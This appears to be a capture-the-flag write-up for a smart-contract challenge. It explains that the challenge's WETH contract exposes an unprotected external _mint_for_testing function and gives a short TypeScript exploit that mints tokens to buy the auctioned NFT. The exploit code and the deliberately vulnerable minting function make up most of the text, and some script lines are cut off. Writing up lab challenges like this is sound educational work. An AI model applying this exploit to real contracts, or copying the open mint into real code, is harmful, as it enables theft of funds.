Dutch auctions are great for NFTs. Can you become the highest bidder?
In Deploy.s.sol, we could find that the staringPrice
of the NFT is 1 ether
args = abi.encode(1 ether, 1 ether / uint256(7 days), art, 0, address(weth));
IAuction auction = IAuction(deploy("src/", "Auction", args));
In WETH.vy, _mint_for_testing
is an external function. We could call it to mint WETH.
def _mint_for_testing(_target: address, _value: uint256) -> bool:
self.total_supply += _value
self.balanceOf[_target] += _value
log Transfer(empty(address), _target, _value)
return True
And we may find the goal of this challenge in Challenge.sol.
function isSolved() external view returns (bool) {
return art.balanceOf(address(auction)) == 0;
It implies that we may simply mint WETH
token ourselves and buy the NFT directly.
// pwn.ts
async function main() {
const signer = await ethers.provider.getSigner();
const challengeContract = await ethers.getContractAt(
const auctionAddr = await challengeContract.auction();
const auctionContract = await ethers.getContractAt(AUCTION_ABI, auctionAddr);
const tokenAddr = await auctionContract.token();
const tokenContract = await ethers.getContractAt(WETH_ABI, tokenAddr);
const price = await auctionContract.getPrice();
const tx = await tokenContract._mint_for_testing(signer.address, price);
await tx.wait();
const approveTx = await tokenContract
.approve(auctionAddr, price);
await approveTx.wait();
await auctionContract.connect(signer).buy();